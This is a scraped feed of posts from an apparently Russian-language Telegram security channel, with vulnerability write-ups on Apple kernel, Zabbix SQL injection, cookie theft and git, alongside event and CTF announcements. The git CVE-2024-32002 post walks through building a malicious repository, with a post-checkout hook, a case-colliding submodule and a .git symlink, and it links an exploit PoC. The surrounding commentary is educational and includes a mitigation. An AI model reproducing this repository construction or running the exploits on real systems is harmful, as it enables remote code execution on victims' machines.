Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
RCE in Apple kernel
CVE-2024-27804

#CVE #RCE #apple

Уязвимость CVE-2024-27804 нашёл Meysam Firouzi (@R00tkitSMM). Обнаружена она была в ядре в AppleAVD. Она затрагивает старые версии операционных систем Apple, включая iOS и iPadOS 17.4.1. Эта уязвимость может позволить злоумышленникам выполнить произвольный код с привилегиями ядра. В настоящее время обход SPTM для arm64e-устройств под управлением iOS и iPadOS 17 не существует, поэтому джейлбрейк с помощью этого эксплойта пока невозможен.

Затронутые версии:
iOS and iPadOS < 17.5
macOS < 14.5
watchOS < 10.5
tvOS < 17.5

Эксплуатация:
./build.sh
./panic.sh


🧩 PoC

❗️ Apple Security Update

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍1
Forwarded from Хакер — Xakep.RU
Стартует квест для читателей «Хакера»!

В этом году «Хакер» празднует 25-летие, и сегодня в качестве эксперимента мы запускаем небольшое развлечение. Это хакерский квест, который по задумке должен занять тебя на выходных.

https://xakep.ru/2024/05/17/xakep-quest/
Привет! Объявляем старт конкурса по поиску уязвимостей в мобильных приложениях Яндекса! 🎉

Охотьтесь на ошибки в популярных приложениях Яндекса и получите до 1 000 000 рублей. За обновлениями следите в телеграм-канале конкурса. Там же найдете активности и полезности для багхантеров, а еще анонсы других конкурсов.

До 10 июня награда повышена до 1 000 000 рублей за обнаружение потенциальной ошибки. Используйте только тестовые учётные записи, реальных пользователей атаковать нельзя. Больше информации о конкурсе — на сайте.
🔥5😁3
Forwarded from Cult Of Wire
Что было. Что будет. Чем сердце успокоится.

На OffensiveCon 2024 Solar Designer (фаундер Openwall) сделал неплохой доклад "Password cracking: past, present, future".

Видео с доклада пока что нет, но есть слайды (картинками и PDF).
🔥10😁1
Forwarded from 1N73LL1G3NC3
CVE-2024-22120: Time Based SQL Injection in Zabbix Server Audit Log

Zabbix server can perform command execution for configured scripts. After command is executed, audit entry is added to "Audit Log". Due to "clientip" field is not sanitized, it is possible to injection SQL into "clientip" and exploit time based blind SQL injection.

Affected and fixed version/s:
* 6.0.0 - 6.0.27 / 6.0.28rc1
* 6.4.0 - 6.4.12 / 6.4.13rc1
* 7.0.0alpha1 - 7.0.0beta1 / 7.0.0beta2


Allows to dump any values from database. As an example of exploit above allows privilege escalation from user to admin. In some cases, SQL injection leads to RCE.

Description: https://support.zabbix.com/browse/ZBX-24505
10🔥2😁1
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
💻 Pivot to the Clouds: Кража cookie в 2024 году

Недавно я наткнулся на очень интересную статью на блоге Embrace the Red, посвященную кражам cookie 🍪 в 2024 году. Автор подробно разобрал тему, и я решил перевести статью на русский язык, чтобы поделиться этими знаниями с русскоязычной аудиторией.

Огромное спасибо автору за этот полезный и содержательный пост! ❤️


🌐 Ссылка на Habr — ТЫК

Выжимка интересных моментов из статьи:

Кража cookie 🍪 с использованием удаленной отладки:
Вредоносное ПО запускает браузер с включенной функцией удаленной отладки и подключается к порту отладки, что позволяет злоумышленнику загружать все файлы cookie или удаленно управлять браузером.

Сложности обнаружения:
Несмотря на то, что техника кражи cookie 🍪 с использованием удаленной отладки была известна уже несколько лет, антивирусы и EDR по умолчанию не могут справиться с этой бедой.

Роль PowerShell и ChatGPT:
В статье приводится пример использования PowerShell для автоматизации атаки, где значительную часть кода помог написать ChatGPT. 😎

Рекомендации по защите:
Рекомендуется использовать выделенные рабочие станции и учетные записи администраторов для управления критическими ресурсами, а также собирать и анализировать журналы событий для выявления подозрительных процессов, запускающих браузер с отладочным портом.

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7
Хакеры с точки зрения лида
Я руковожу хакерами уже 6 лет, и с тех пор часть моей работы - это практически бесконечный поиск талантов в команду. Что удалось узнать про поиск хакеров за эти 6 лет?

Хакеров мало.
С одной стороны, это хорошо - мусорные отклики на hh фильтруются парой специфичных вопросов про инструментарий и owasp, и этим успешно занимается рекрутер. С другой - вакансия может закрываться несколько месяцев, полгода, год. И когда талантливый хакер наконец найден и принят в команду, становится крайне важным его удержать.

Хакеры - тоже люди.
Как и все мы. Важно находить индивидуальный подход к каждому. Принцип "не нравится - увольняйся" тут не сработает. Хакеров по моему профилю - мобильные приложения - еще меньше, поэтому с первых дней тимлидства я учился ценить каждого. Обратная сторона этого - давать посредственным сотрудникам больше, чем они вкладывают в работу. Но выход есть: брать в команду только тех, кто готов показывать результат, а не просто работу работает.

Хакеры - энтузиасты.
Говорить о том, что это круто - слишком очевидно. Но есть и обратная сторона. Когда твои профессиональные стандарты слишком высоки, есть риск недооценивать то, чего ты уже достиг. Хакеры часто готовы работать сверхурочно по доброй воле, даже утаивают это от руководителя. Все ради того, чтобы получить признание такого же требовательного сообщества. Как не дать им выгореть? Для таких ребят создавать комфорт на рабооте - беспроигрышная инвестиция. А еще важно подмечать успехи и старания. На собеседованиях я насмотрелся на самоуверенных ребят, чьи хард скиллы - посредственны. Поэтому хвалить и поощрять достойных ребят нужно обязательно, ведь хорошая работа так редко встречается. Ваши хакеры должны знать, что они круты!

Не только хакеры
Сейчас я активно набираю уже свою третью команду, и в этот раз в ней есть не только хакеры. Однако привычка брать людей с хакерским мышлением осталась. Такие люди встречаются и в других профессиях. Однажды расскажу про это подробнее!)
33🔥6
Forwarded from Новости SPbCTF (Kseniya Kravtsova)
Приглашаем на AI CTF 2024 🤖

Мир заговорил про AI в конце 2022 года, а на PHDays ещё с 2019 проводится соревнование по безопасности machine learning — AI CTF. В этот раз и мы к нему причастны :)

24 мая 12:00 — 25 мая 23:59 мск
🌐 Jeopardy, индивидуальное участие из любой точки мира
🎁 Топ-3 по очереди забирают себе один из призов:
🔹 Ray-Ban Meta — умные очки в классическом стиле Ray-Ban
🔹 Playdate — портативная игровая консоль в ретро-стиле с чёрно-белым экраном и ручкой-вертушкой
🔹 Quest 3 — просто хорошая Мixed Reality гарнитура

Если будете на PHDays, отметьте при регистрации — трём лучшим участникам c площадки вручим памятные сувениры.

В заданиях будут ML-ные ситуации, в которых нужно что-то хакнуть. Друзей из Data Science, которые интересуются безопасностью систем ИИ, тоже зовите.

👍 Зарегистрироваться → aictf.phdays.fun/
⬜️ Стартуем в пятницу. Устройте себе 36-часовой челлендж!

Какие задания были в прошлые годы: 2019, 2021, 2022
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥53😁1
❗️ RCE через git clone ❗️
CVE-2024-32002

Сложность эксплуатации: простая
#RCE #CVE #git

➡️Идея о том, что RCE может быть достигнута простой командой git clone.
Важное замечание: атака работает из-за включенных символических ссылок, следовательно можно избежать атаки выключив их git config --global core.symlinks false

➡️Внутренняя кухня git'а
git - это система контроля версий, которая отслеживает изменения в коде с течением времени. Она управляет сложными проектами, разделяя их на более мелкие, управляемые куски, называемые репозиториями. Чтобы еще больше упростить этот процесс, Git использует подмодули - по сути, репозитории, вложенные в другие репозитории. Запомните эту концепцию.

Каждый подмодуль находится в определенном каталоге в основном репозитории. Git отслеживает путь к подмодулю, обеспечивая точную запись изменений. Однако есть одна загвоздка: в файловых системах, не чувствительных к регистру (как, например, в Windows и macOS по умолчанию), A/modules/x и a/modules/x считаются одним и тем же путем. Эта, казалось бы, мелочь - это БАЗА для CVE-2024-32002.

➡️Символьные ссылки
Символьные ссылки - это объекты файловой системы, которые служат указателями на другие файлы или каталоги. В контексте Git они могут использоваться для ссылок на другие части репозитория. Несмотря на удобство, симлинки также могут быть использованы во вредоносных целях.

➡️Чекаем изменения в коммитах
Всего было изменено 2 файла, builtin/submodule--helper.c и t/t7406-submodule-update.sh

➡️Рассмотрим builtin/submodule--helper.c
Сфокусируемся на функции clone_submodule, которая как вы могли догадаться, занимается клонируем.
▪️Новая функция dir_contains_only_dotgit: Эта функция проверяет, содержит ли каталог только файл или каталог .git. Если присутствуют другие файлы или каталоги, она возвращает ошибку. Это выглядит как проверка безопасности, чтобы исключить случайную перезапись каталогов с помощью симлинков.
▪️Изменения в clone_submodule: Прежде чем приступить к клонированию, Git проверяет, существует ли каталог субмодуля и пуст ли он. Если нет, он прерывает операцию, чтобы избежать случайной перезаписи.Изменения в clone_submodule: Прежде чем приступить к клонированию, Git проверяет, существует ли каталог субмодуля и пуст ли он. Если нет, он прерывает операцию, чтобы избежать случайной перезаписи.

➡️Рассмотрим t/t7406-submodule-update.sh
1. Глобальная конфигурация
test_config_global protocol.file.allow always &&
test_config_global core.symlinks true &&
tell_tale_path="$PWD/tell.tale" &&

Скрипт устанавливает параметры конфигурации Git: protocol.file.allow всегда включает файловый протокол для Git. core.symlinks true обеспечивает включение поддержки симлинков.
Также скрипт определяет tell_tale_path как файл-маркер для проверки работоспособности RCE.

2. Настройка hook репозитория
git init hook &&
(
cd hook &&
mkdir -p y/hooks &&
write_script y/hooks/post-checkout <<-EOF &&
echo HOOK-RUN >&2
echo hook-run >"$tell_tale_path"
EOF
git add y/hooks/post-checkout &&
test_tick &&
git commit -m post-checkout
) &&

Инициализирует новый репозиторий с именем hook.
Создает пост-чекаут хук, который записывает hook-run в tell_tale_path.
Коммитит скрипт хука в репозиторий hook.

3. Настройка main репозитория
hook_repo_path="$(pwd)/hook" &&
git init captain &&
(
cd captain &&
git submodule add --name x/y "$hook_repo_path" A/modules/x &&
test_tick &&
git commit -m add-submodule &&
printf .git >dotgit.txt &&
git hash-object -w --stdin <dotgit.txt >dot-git.hash &&
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info &&
git update-index --index-info <index.info &&
test_tick &&
git commit -m add-symlink
) &&

Определяет путь к хранилищу hook'ов.
Инициализирует другой репозиторий с именем captain.
Добавляет репозиторий hook в качестве подмодуля в A/modules/x и фиксирует это изменение.
Создает симлинк, указывающий на .git, и обновляет индекс с помощью этого симлинка.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥64👍1
➡️Тестим нашу вкусняшку
test_path_is_missing "$tell_tale_path" &&
test_must_fail git clone --recursive captain hooked 2>err &&
grep "directory not empty" err &&
test_path_is_missing "$tell_tale_path"

Проверяет, что tell_tale_path изначально не существует.
Пытается рекурсивно клонировать репозиторий captain, ожидая, что операция завершится неудачей.
Проверяет сообщение об ошибке directory not empty, подтверждая предотвращение уязвимости.
Убеждается, что tell_tale_path по-прежнему не существует, что указывает на то, что hook после проверки не был запущен. Моей целью было сделать все наоборот!

➡️Итог ресерча
Корень проблемы кроется в том, что файловые системы с учетом регистра воспринимают такие пути, как A/modules/x и a/modules/x, как идентичные. Это позволяет создать вредоносную симлинку внутри подмодуля. Эта символическая ссылка называется с учетом регистра пути подмодуля (например, A/modules/x), но скрытно указывает на скрытый каталог .git/ подмодуля.

⚠️ RCE PoC ⚠️
Эксплойт работает на Windows & MacOS
Вы можете забрать скрипт для билда репозиториев ТЫК
git clone --recursive [email protected]:szybnev/git_rce.git


➡️ Ресерч

🧩 PoC

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11🐳31
❗️ RCE через git clone ❗️
CVE-2024-32002

Сложность эксплуатации: простая
#RCE #CVE #git

⚠️ Читать в Teletype

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
14
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 Вся программа киберфестиваля Positive Hack Days 2 — на нашем сайте

В течение четырех дней вас ждут более 20 крутейших треков о кибербезопасности, разработке, бизнесе, а также увлекательная научно-популярная программа.

🛰 Напомним, что научпоп-сцену «Спутник» смогут посетить бесплатно все желающие. Больше про открытую зону киберфестиваля вы можете узнать в канале @PHDays.

🎫 Для посещения других треков необходимо приобрести билет на нашем сайте, сделав взнос в фонд «Подари жизнь» (минимальная сумма — 1000 рублей).

👀 Посмотреть программу (спойлер: еще будут дополнения, но основная часть уже опубликована)

До встречи с 23 по 26 мая в «Лужниках»!

P. S. Смотреть трансляции почти со всех треков можно будет и онлайн без регистрации и смс, но рекомендуем увидеть весь масштаб вживую 😉

@Positive_Technologies
#PHD2
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6🔥4🐳4
Сходка Похек

Всем привет, меня давно просили и вижу другие админы это анонсят. Так что давайте всё таки сделаем нашу сходку)

Предлагаю следующие даты:
23 в час пик, когда все придут и 25 после кибербитвы, т.к. многие из вас играют в кибербитве. Так же после 25 есть предложение сходить в грузинский ресторан (там на 12 человек бронь максимум), остальные приходят в порядке живой очереди. Если нас будет сильно больше, то пойдем в кальн-ресторан. Мы там уже проводили Xakep Meetup и до этого был там раза 3. Локация вместит около 30 человек точно. Надо просто заранее будет.

Что думаете? Голосовалка ниже

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
11🔥4😁2
23 число, платная зона PHD
Anonymous Poll
62%
Буду
38%
Буду с вами удаленно
25 число после КиберБитвы, 2 ресторана в зависимости от кол-ва людей 🕺
Anonymous Poll
50%
Буду
50%
Буду удаленно
Похек
25 число после КиберБитвы, 2 ресторана в зависимости от кол-ва людей 🕺
Ещё раз. Если будет <=12, то идём в грузинский ресторан. Если больше 12, то кальян-ресторан

P.S. я ещё раз сделаю голосовалку 25 числа по поводу ресторана, чтобы было понятно, кто точно будет
Также я буду стримить, фоткать, вкидывать сторисы и расшарю гео на канал. Так что кто хочет, всегда будет знать где меня найти)
🔥51
Forwarded from Cyber Media
🗣 Юрий Шабалин, Стингрей Технолоджиз: Если сторы подключатся к информированию разработчиков об уязвимостях, уровень безопасности мобильных приложений возрастет кратно

Юрий Шабалин, генеральный директор компании «Стингрей Технолоджиз» и автор телеграм-канала «Mobile AppSec World», рассказал порталу Cyber Media о ситуации с мобильными приложениями в России. Поговорили о модерации в сторах, обходе блокировок, мошеннических уловках для загрузки вредоносных приложений, снижении общего уровня защищенности и бдительности пользователей.
Please open Telegram to view this post
VIEW IN TELEGRAM
4
Forwarded from Positive Hack Days Media
This media is not supported in your browser
VIEW IN TELEGRAM
На киберфестивале Positive Hack Days 2 мы предложим вам взломать нас 😏

Да, это не шутка. Мы проведем SEQuest — конкурс, в котором любой желающий сможет без последствий попробовать себя в роли хакера и проверить свои скилы в социальной инженерии. Ну а за успешное выполнение заданий мы щедро наградим участников.

😏 Что нужно будет сделать

Если коротко — выполнить семь заданий с разным уровнем сложности незаметно для организаторов, то есть нас. Вот они:

1. Изготовить копию бейджа организатора на свое имя.
2. На стойке регистрации получить настоящий бейдж организатора на свое имя.
3. Сделать футболку организатора или принести оригинальную.
4. Получить доступ к громкой связи мероприятия.
5. Получить уникальный стикер из штаба конференции.
6. Пройти в штаб организаторов и узнать пароль от Wi-Fi.
7. Получить доступ к прилавку с мерчем фестиваля.

Безусловно, есть базовые запреты: нельзя физически воздействовать на организаторов и входить с ними в умышленный сговор.

Безусловно, есть базовые разрешения: вы можете манипулятивно воздействовать на организаторов и вводить их в заблуждение, но исключительно для выполнения заданий конкурса.

😮 Как принять участие

Расписаться на стенде конкурса и получить полные правила (подробности — на сайте). Перед началом конкурса его организатор Антон Бочкарев, основатель «Третьей стороны», проведет базовый экскурс в социальную инженерию, который поможет участникам. Ну а дальше — дело за вами.

За решения заданий вы будете получать баллы, а те, кто займут призовые места, — получат мерч профи социальной инженерии. Ждем вас и не желаем удачи 🤓

@PHDays
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰84
This media is not supported in your browser
VIEW IN TELEGRAM
4🐳2😁1